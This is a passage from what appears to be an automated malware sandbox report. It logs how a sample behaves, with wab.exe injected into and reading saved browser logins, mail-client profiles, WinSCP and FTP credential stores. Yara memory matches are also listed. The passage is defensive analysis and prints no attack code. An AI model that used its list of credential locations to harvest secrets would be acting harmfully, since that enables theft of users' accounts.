Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe Code function: 10_2_00623675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 10_2_00623675
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

barindex
Source: Yara match File source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: Yara match File source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: 00000009.00000002.2957213484.0000000022E8E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2957213484.0000000022EB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2957213484.0000000022E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wab.exe PID: 5440, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs